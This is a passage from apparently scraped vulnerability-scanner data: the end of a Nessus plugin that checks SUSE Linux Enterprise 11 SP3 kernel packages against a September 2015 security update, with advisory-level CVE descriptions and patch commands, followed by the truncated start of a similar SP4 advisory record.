(bsc#936831).\n\n - CVE-2015-1420: A race condition in the handle_to_path\n function in fs/fhandle.c in the Linux kernel allowed\n local users to bypass intended size restrictions and\n trigger read operations on additional memory locations\n by changing the handle_bytes value of a file handle\n during the execution of this function (bnc#915517).\n\n - CVE-2015-4700: A local user could have created a bad\n instruction in the JIT processed BPF code, leading to a\n kernel crash (bnc#935705).\n\n - CVE-2015-4167: The UDF filesystem in the Linux kernel\n was vulnerable to a crash which could occur while\n fetching inode information from a corrupted/malicious\n udf file system image. (bsc#933907).\n\n - CVE-2014-9728 CVE-2014-9729 CVE-2014-9730 CVE-2014-9731:\n Various issues in handling UDF filesystems in the Linux\n kernel allowed the corruption of kernel memory and other\n issues. An attacker able to mount a corrupted/malicious\n UDF file system image could cause the kernel to crash.\n (bsc#933904 bsc#933896)\n\n - CVE-2015-2150: The Linux kernel did not properly\n restrict access to PCI command registers, which might\n have allowed local guest users to cause a denial of\n service (non-maskable interrupt and host crash) by\n disabling the (1) memory or (2) I/O decoding for a PCI\n Express device and then accessing the device, which\n triggers an Unsupported Request (UR) response\n (bsc#919463).\n\n - CVE-2015-0777: drivers/xen/usbback/usbback.c as used in\n the Linux kernel 2.6.x and 3.x in SUSE Linux\n distributions, allowed guest OS users to obtain\n sensitive information from uninitialized locations in\n host OS kernel memory via unspecified vectors\n (bnc#917830).\n\n - CVE-2015-2830: arch/x86/kernel/entry_64.S in the Linux\n kernel did not prevent the TS_COMPAT flag from reaching\n a user-mode task, which might have allowed local users\n to bypass the seccomp or audit protection mechanism via\n a crafted application that uses the (1) fork or (2)\n close system 
call, as demonstrated by an attack against\n seccomp before 3.16 (bnc#926240).\n\n - CVE-2015-1805: The Linux kernels implementation of\n vectored pipe read and write functionality did not take\n into account the I/O vectors that were already processed\n when retrying after a failed atomic access operation,\n potentially resulting in memory corruption due to an I/O\n vector array overrun. A local, unprivileged user could\n use this flaw to crash the system or, potentially,\n escalate their privileges on the system. (bsc#933429).\n\nAlso \n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=851068\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=867362\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=873385\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=883380\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=886785\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=894936\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=915517\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=917830\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=919463\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.suse.com/show_bug.cgi?id=920110\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=920250\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=920733\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=921430\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=923245\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=924701\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=925705\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=925881\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=925903\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=926240\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=926953\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=927355\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=927786\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=929142\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=929143\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=930092\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=930761\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.suse.com/show_bug.cgi?id=930934\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931538\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=932348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=932458\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933429\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933896\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933904\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933907\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933936\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=934742\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=934944\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935053\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935572\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935705\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935866\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935906\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936077\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.suse.com/show_bug.cgi?id=936423\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936637\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936831\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936875\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936925\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937402\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937444\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937503\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937641\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937855\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=939910\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=939994\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=940338\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=940398\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942350\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9728/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://www.suse.com/security/cve/CVE-2014-9729/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9730/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9731/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-0777/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-1420/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-1805/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-2150/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-2830/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4167/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4700/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5364/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5366/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5707/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151611-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?441d7fc3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for VMWare 11-SP3 :\n\nzypper in -t patch slessp3-kernel-201508-12100=1\n\nSUSE Linux Enterprise Server 11-SP3 :\n\nzypper in -t patch 
slessp3-kernel-201508-12100=1\n\nSUSE Linux Enterprise Server 11-EXTRA :\n\nzypper in -t patch slexsp3-kernel-201508-12100=1\n\nSUSE Linux Enterprise Desktop 11-SP3 :\n\nzypper in -t patch sledsp3-kernel-201508-12100=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3 :\n\nzypper in -t patch dbgsp3-kernel-201508-12100=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-bigsmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-bigsmp-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-bigsmp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-bigsmp-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED11|SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED11 / SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED11\" && (! 
preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED11 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-ec2-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-ec2-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-bigsmp-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-bigsmp-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-bigsmp-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-pae-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-extra-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-bigsmp-extra-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-pae-extra-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"s390x\", 
reference:\"kernel-default-man-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-default-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-default-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-default-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-source-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-syms-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-trace-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-trace-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-trace-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-default-extra-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-ec2-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-ec2-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-ec2-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-xen-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-xen-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-xen-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-pae-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-pae-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", 
reference:\"kernel-pae-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-xen-extra-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-pae-extra-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-extra-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-source-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-syms-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-trace-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-extra-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-bigsmp-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-pae-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.0.101-0.47.67.2\")) flag++;\nif 
(rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-pae-extra-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-default-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-default-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-default-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-default-extra-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-source-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-syms-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-trace-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-xen-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-xen-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-xen-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-xen-extra-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-pae-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-pae-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-pae-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-pae-extra-3.0.101-0.47.67.2\")) 
flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T14:23:03", "description": "The SUSE Linux Enterprise 11 SP4 kernel was updated to receive various\nsecurity and bugfixes.\n\nFollowing security bugs were fixed :\n\n - CVE-2015-6252: Possible file descriptor leak for each\n VHOST_SET_LOG_FDcommand issued, this could eventually\n wasting available system resources and creating a denial\n of service (bsc#942367).\n\n - CVE-2015-5707: Possible integer overflow in the\n calculation of total number of pages in\n bio_map_user_iov() (bsc#940338).\n\n - CVE-2015-5364: The (1) udp_recvmsg and (2) udpv6_recvmsg\n functions in the Linux kernel before 4.0.6 do not\n properly consider yielding a processor, which allowed\n remote attackers to cause a denial of service (system\n hang) via incorrect checksums within a UDP packet flood\n (bsc#936831).\n\n - CVE-2015-5366: The (1) udp_recvmsg and (2) udpv6_recvmsg\n functions in the Linux kernel before 4.0.6 provide\n inappropriate -EAGAIN return values, which allowed\n remote attackers to cause a denial of service (EPOLLET\n epoll application read outage) via an incorrect checksum\n in a UDP packet, a different vulnerability than\n CVE-2015-5364 (bsc#936831).\n\n - CVE-2015-1420: Race condition in the handle_to_path\n function in fs/fhandle.c in the Linux kernel through\n 3.19.1 allowed local users to bypass intended size\n restrictions and trigger read operations on additional\n memory locations by changing the handle_bytes value of a\n file handle during the execution of this function\n (bsc#915517).\n\n - CVE-2015-1805: The (1) pipe_read and (2) pipe_write\n implementations in fs/pipe.c in the Linux 
kernel before\n 3.16 do not properly consider the side effects of failed\n __copy_to_user_inatomic and __copy_from_user_inatomic\n calls, which allows local users to cause a denial of\n service (system crash) or possibly gain privileges via a\n crafted application, aka an 'I/O' vector array overrun.\n (bsc#933429)\n\n - CVE-2015-2150: Xen 3.3.x through 4.5.x and the Linux\n kernel through 3.19.1 do not properly restrict access to\n PCI command registers, which might allow local guest\n users to cause a denial of service (non-maskable\n interrupt and host crash) by disabling the (1) memory or\n (2) I/O decoding for a PCI Express device and then\n accessing the device, which triggers an Unsupported\n Request (UR) response. (bsc#919463)\n\n - CVE-2015-2830: arch/x86/kernel/entry_64.S in the Linux\n kernel before 3.19.2 does not prevent the TS_COMPAT flag\n from reaching a user-mode task, which might allow local\n users to bypass the seccomp or audit protection\n mechanism via a crafted application that uses the (1)\n fork or (2) close system call, as demonstrated by an\n attack against seccomp before 3.16. 
